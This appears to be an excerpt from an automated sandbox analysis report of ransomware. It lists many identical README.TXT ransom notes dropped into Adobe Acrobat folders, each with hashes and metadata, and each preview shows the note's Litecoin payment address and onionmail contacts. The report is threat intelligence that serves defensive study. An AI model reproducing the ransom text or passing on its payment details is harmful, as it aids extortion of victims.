                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-sl\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ar-ae\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
